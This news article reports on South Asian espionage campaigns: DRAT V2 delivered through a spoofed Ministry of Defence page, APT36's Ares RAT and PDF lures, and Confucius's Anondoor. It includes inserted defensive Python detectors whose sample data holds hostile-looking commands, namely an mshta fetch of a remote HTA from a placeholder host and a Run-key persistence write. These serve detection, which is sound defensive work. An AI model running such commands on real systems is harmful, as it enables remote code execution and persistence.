A hacking group with ties to Pakistan has been observed targeting Indian government organizations with a revised version of a remote access trojan (RAT) called DRAT.
Recorded Future's Insikt Group is tracking the activity under the moniker TAG-140, which it said overlaps with SideCopy, an adversarial collective assessed to be an operational sub-cluster of Transparent Tribe (aka APT-C-56, APT36, Datebug, Earth Karkaddan, Mythic Leopard, Operation C-Major, and ProjectM).
"TAG-140 has consistently demonstrated iteration and variety in its malware arsenal and delivery techniques," the Mastercard-owned company said in an analysis published last month.
"This latest campaign, which spoofed the Indian Ministry of Defence through a cloned press release portal, marks a minor but notable shift in both malware architecture and command-and-control (C2) functionality."
The updated version of DRAT, called DRAT V2, is the latest addition to SideCopy's arsenal, which also includes Action RAT, AllaKore RAT, Ares RAT, CurlBack RAT, ReverseRAT, Spark RAT, and Xeno RAT, tooling capable of infecting both Windows and Linux systems.
The activity reflects the adversary's evolving playbook and highlights the group's ability to refine and diversify an "interchangeable suite" of RATs in order to complicate detection and monitoring while harvesting sensitive data.
The threat actor's attacks have expanded their targeting from the government, defense, maritime, and academic sectors to include organizations affiliated with India's railway, oil and gas, and external affairs ministries. The group is believed to have been active since at least 2019.
The infection sequence documented by Recorded Future leverages a ClickFix-style approach that spoofs the official press release portal of the Indian Ministry of Defence to drop the .NET-based DRAT in a new Delphi-compiled variant.
The fake website contains a single active link which, when clicked, starts an infection sequence that copies a malicious command to the machine's clipboard and urges the victim to paste and execute it by launching the command shell.
The command fetches content from an external server ("trade4wealth[.]in") that is then executed via mshta.exe to launch a loader called BroaderAspect. The loader is responsible for downloading and opening a decoy PDF, establishing persistence through Windows Registry changes, and downloading DRAT V2 from the same server.
DRAT V2 adds a new command for arbitrary shell command execution, which improves the flexibility of post-exploitation activity. It also obfuscates its C2 IP address using Base64 encoding and updates its custom server-initiated TCP protocol to accept command input in both ASCII and Unicode, although the server responds only in ASCII. The original DRAT required Unicode for both input and output.
"Compared to its predecessor, DRAT V2 reduces string obfuscation by keeping most command headers in plaintext, likely prioritizing parsing reliability over stealth," Recorded Future said. "DRAT V2 lacks advanced anti-analysis techniques and relies on basic infection and persistence methods, leaving it detectable through static and behavioral analysis."
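The two defender-side checks that follow from the chain described above are a behavioral one (mshta.exe launched against a remote URL from an interactive shell, followed by a Run-key write for persistence) and a static one (a Base64 string that decodes to an IPv4 address, the form of C2 obfuscation noted for DRAT V2). The block below is an added example and is not code from the article, Recorded Future, or the malware; the `parent=...|image=...|cmd=...` event format, the field names, the hostname `update.example.invalid`, and the address `203.0.113.10` are all constructed for the demonstration.

```python
"""Added example: triage of constructed process-creation events for a ClickFix-style
mshta.exe chain plus Run-key persistence, and a helper that recovers an IPv4 address
hidden in a Base64 string. Not the article's or Recorded Future's code."""
import base64
import binascii
import ipaddress
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry (assumed "key=value|key=value" shape, not real EDR output).
# Map your own Sysmon/EDR fields onto parent, image and cmd when adapting this.
SAMPLE_LINES = [
    "parent=C:\\Windows\\System32\\cmd.exe|image=C:\\Windows\\System32\\mshta.exe"
    "|cmd=mshta.exe http://update.example.invalid/launch.hta",
    "parent=C:\\Windows\\System32\\cmd.exe|image=C:\\Windows\\System32\\reg.exe"
    "|cmd=reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Loader /t REG_SZ /d C:\\Users\\Public\\ld.exe /f",
    "parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\mshta.exe"
    "|cmd=mshta.exe C:\\Program Files\\Vendor\\setup.hta",
    "parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\notepad.exe|cmd=notepad.exe notes.txt",
]

REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)
# Shells a user would paste a clipboard command into, plus explorer.exe for the Run dialog.
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}


def parse_line(line: str) -> ProcEvent:
    """Parse one constructed event line into a ProcEvent (assumes no '|' inside values)."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcEvent(fields["parent"], fields["image"], fields["cmd"])


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_remote_mshta(ev: ProcEvent) -> bool:
    """mshta.exe given a remote http(s) URL: the HTA is fetched from the attacker's server."""
    return basename(ev.image) == "mshta.exe" and REMOTE_URL.search(ev.command_line) is not None


def is_run_key_write(ev: ProcEvent) -> bool:
    """reg.exe adding a value under a CurrentVersion\\Run key: classic registry persistence."""
    cmd = ev.command_line.lower()
    return basename(ev.image) == "reg.exe" and " add " in cmd and RUN_KEY.search(ev.command_line) is not None


def triage(lines):
    """Return (image, tags) for every event that matched at least one rule."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        tags = []
        if is_remote_mshta(ev):
            tags.append("mshta_remote_hta")
        if is_run_key_write(ev):
            tags.append("run_key_persistence")
        if tags and basename(ev.parent_image) in INTERACTIVE_PARENTS:
            tags.append("interactive_parent")  # consistent with a pasted clipboard command
        if tags:
            hits.append((basename(ev.image), tuple(tags)))
    return hits


def decode_b64_ipv4(token: str):
    """Return the IPv4 address a Base64 token decodes to, or None if it is not one."""
    try:
        raw = base64.b64decode(token, validate=True).decode("ascii")
        return str(ipaddress.IPv4Address(raw))
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


# Constructed token: TEST-NET-3 address, not an indicator from the report.
SAMPLE_C2_TOKEN = base64.b64encode(b"203.0.113.10").decode()

if __name__ == "__main__":
    for image, tags in triage(SAMPLE_LINES):
        print(image, tags)
    print(SAMPLE_C2_TOKEN, "->", decode_b64_ipv4(SAMPLE_C2_TOKEN))
```

The locally sourced `setup.hta` in the third sample is deliberately left unflagged: the signal worth alerting on is mshta.exe reaching out to a remote URL, not mshta.exe itself, which legitimate installers still use.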
Other known capabilities allow it to perform a variety of actions on compromised hosts, including conducting reconnaissance, uploading additional payloads, and exfiltrating data.
"These tasks offer TAG-140 consistent, flexible control over infected systems and allow for both automated and interactive post-exploitation activity without requiring the deployment of auxiliary malware tools," the company said.
"DRAT V2 appears to be another modular addition rather than a definitive evolution, reinforcing the likelihood that TAG-140 will continue to rotate RATs across campaigns to obscure signatures and maintain operational flexibility."
APT36 Campaigns Deliver Ares RAT and DISGOMOJI
During the India-Pakistan conflict in May 2025, APT36 capitalized on the situation to distribute Ares RAT in attacks targeting the government, defense, IT, healthcare, education, and telecom sectors, alongside coordinated hacktivist operations by Pakistan-aligned state-sponsored threat actors.
"With the deployment of tools such as Ares RAT, the attackers achieved complete remote access to infected systems, including surveillance, opening the door to data theft and potential sabotage of critical services," Seqrite Labs noted back in May 2025.
More recently, APT36 campaigns have been found spreading spear-phishing emails with malicious PDF attachments to target Indian defense personnel.
The messages impersonate purchase orders from the National Informatics Centre (NIC) and persuade recipients to click an embedded button within the PDF document. Doing so downloads an executable that masquerades with a PDF icon and a double-extension filename (i.e., *.pdf.exe) so that it appears legitimate to Windows users.
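The lure described above relies on two properties of the attachment that a mail gateway or endpoint can test directly: a filename whose real extension hides behind a document-like one, and a payload whose actual file type does not match the type its name claims. The block below is an added example and is not code from the article or CYFIRMA; the attachment names and the byte strings are constructed, and the extension lists are an assumption to tune for your environment. It goes slightly beyond the article's `*.pdf.exe` case by also catching padding spaces before the real extension and renamed executables with a single, deceptive `.pdf` extension.

```python
"""Added example: flag double-extension lures and claimed-vs-actual file type mismatches
on constructed attachment samples. Not the article's or CYFIRMA's code."""

# Assumed extension lists; extend them to match the document and script types you see.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "hta", "js", "vbs", "msi", "lnk"}

# Leading bytes that identify the real container, independent of the filename.
MAGIC = {b"MZ": "exe", b"%PDF": "pdf", b"PK\x03\x04": "zip"}
# What a given claimed extension should sniff as (Office OOXML files are ZIP containers).
EXPECTED_SNIFF = {"pdf": "pdf", "exe": "exe", "scr": "exe", "docx": "zip", "xlsx": "zip", "pptx": "zip"}


def segments(filename: str):
    """Split on '.' and strip the whitespace attackers use to push the real extension out of view."""
    return [s.strip() for s in filename.lower().split(".")]


def is_double_extension_lure(filename: str) -> bool:
    """True for name.<document-ext>.<executable-ext>, e.g. Purchase_Order.pdf.exe."""
    segs = segments(filename)
    return len(segs) >= 3 and segs[-1] in EXECUTABLE_EXTS and segs[-2] in DOCUMENT_EXTS


def sniff_type(data: bytes) -> str:
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def claimed_type(filename: str):
    return segments(filename)[-1] if "." in filename else None


def assess(filename: str, data: bytes) -> dict:
    """Combine the name check and the content check into a single verdict."""
    lure = is_double_extension_lure(filename)
    expected = EXPECTED_SNIFF.get(claimed_type(filename))
    actual = sniff_type(data)
    # Only judge a mismatch when both the claim and the sniffed type are known.
    mismatch = expected is not None and actual != "unknown" and actual != expected
    return {
        "double_extension": lure,
        "type_mismatch": mismatch,
        "verdict": "block" if (lure or mismatch) else "allow",
    }


# Constructed samples: first bytes of a PE image and of a PDF, with lure-style names.
SAMPLE_ATTACHMENTS = [
    ("Purchase_Order_NIC.pdf.exe", b"MZ\x90\x00\x03\x00\x00\x00"),  # PE with a fake .pdf suffix
    ("Purchase_Order_NIC.pdf", b"MZ\x90\x00\x03\x00\x00\x00"),      # PE simply renamed to .pdf
    ("Purchase_Order_NIC.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"),    # genuine PDF
    ("Invoice.pdf                 .scr", b"MZ\x90\x00"),             # spaces hide the real extension
]


def assess_attachments(items):
    return [(name, assess(name, data)["verdict"]) for name, data in items]


if __name__ == "__main__":
    for name, verdict in assess_attachments(SAMPLE_ATTACHMENTS):
        print(f"{verdict:5s} {name!r}")
```

The second sample shows why the name check alone is not enough: Windows hides known extensions by default, so a plain `Purchase_Order_NIC.pdf` that begins with `MZ` looks identical to the genuine document in Explorer, and only the content check separates them.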
Besides anti-debugging and anti-VM features designed to sidestep analysis of the binary, it is engineered to launch a next-stage payload in memory that can enumerate files, log keystrokes, capture clipboard contents, harvest browser credentials, and contact a C2 server.
"APT36 represents a significant and ongoing cyber threat to national security, especially to Indian defense infrastructure," CYFIRMA said. "The group's advanced phishing tactics and use of credential theft reflect the sophistication of modern cyber espionage."
Another campaign, flagged by the 360 Threat Intelligence Center, has leveraged a new version of a Go-based malware referred to as DISGOMOJI as part of booby-trapped ZIP files distributed via phishing attacks. The Beijing-based cybersecurity company said the malware "is an ELF executable program written in Golang and uses Google Cloud for C2, which marks a shift from Discord."
"In addition, a browser-stealing plug-in and remote management tools are downloaded to carry out further theft operations and remote control," it said. "The download task of this DISGOMOJI variant is similar to the previously discovered payload, but the earlier DISGOMOJI used a Discord server, while this time it uses the Google Cloud service for communication."
Confucius Drops WooperStealer and Anondoor
The findings come as the cyber espionage actor known as Confucius has been linked to a new campaign delivering an information stealer called WooperStealer and a previously undocumented modular backdoor called Anondoor.
Confucius is assessed to be a threat group operating with objectives aligned with India. It is believed to have been active since at least 2013, targeting government and military entities in South Asia and East Asia.
According to Seebug's Knownsec 404 Team, the multi-stage attack employs Windows shortcut (LNK) files as a starting point to deliver Anondoor using DLL side-loading techniques, after which system information is collected and the next-stage payload is retrieved from a remote server.
The backdoor is fully featured, allowing an attacker to issue commands, execute them, take screenshots, download files, dump passwords from the Chrome browser, and list files and folders.
"It has evolved from a previously exposed single spyware Trojan into a modular backdoor that downloads and executes further components, demonstrating a relatively high capacity for technical iteration," the 404 Team said. "Its backdoor component is implemented in a C# DLL file and evades sandbox detection by loading the specified method via Invoke."